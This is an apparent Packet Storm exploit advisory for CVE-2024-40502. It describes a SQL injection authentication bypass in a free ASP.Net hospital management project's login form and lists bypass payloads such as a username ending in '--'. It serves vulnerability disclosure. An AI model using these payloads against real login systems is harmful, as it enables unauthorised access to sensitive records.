Lucene search
0xMykullPACKETSTORM:179583HistoryJul 17, 2024 - 12:00 a.m.
Hospital Management System Project In ASP.Net MVC 1 SQL Injection
2024-07-1700:00:00
0xMykull
packetstormsecurity.com
193
exploit
vulnerability
sql injection
authentication bypass
web application
improper sanitization
user input
`# Exploit Title: Hospital Management System Project in ASP.Net MVC - SQL
Injection / Authentication Bypass
# Date: 07/16/2024
# Exploit Author: 0xMykull
# Vendor Hompage:
https://itsourcecode.com/free-projects/asp/hospital-management-system-project-in-asp-net-mvc-with-source-code/
# Software Link:
https://itsourcecode.com/free-projects/asp/hospital-management-system-project-in-asp-net-mvc-with-source-code/
# Version: 1
# CVE: CVE-2024-40502
Description:
An SQL injection vulnerability has been discovered in the btn_login_b_Click
function of the affected web application. The vulnerability exists due to
the improper sanitization of user-supplied input in the login form.
Specifically, the txt_login_username.Text and txt_login_pass.Text fields
are concatenated directly into an SQL query string without proper
parameterization or escaping.
Endpoint: https://localhost:44306/Users/Loginpage.aspx
Bypass Payloads:
(default user)
Username: kihsan'--
password: <anything>
Username: <anyvaliduser>'--
password: <anything>
`
Related
cvelist
cvelist
CVE-2024-40502
2024-07-22 00:00:00
zdt
zdt
cve
cve
CVE-2024-40502
2024-07-22 21:15:04
vulnrichment
vulnrichment
CVE-2024-40502
2024-07-22 00:00:00
nvd
nvd
CVE-2024-40502
2024-07-22 21:15:04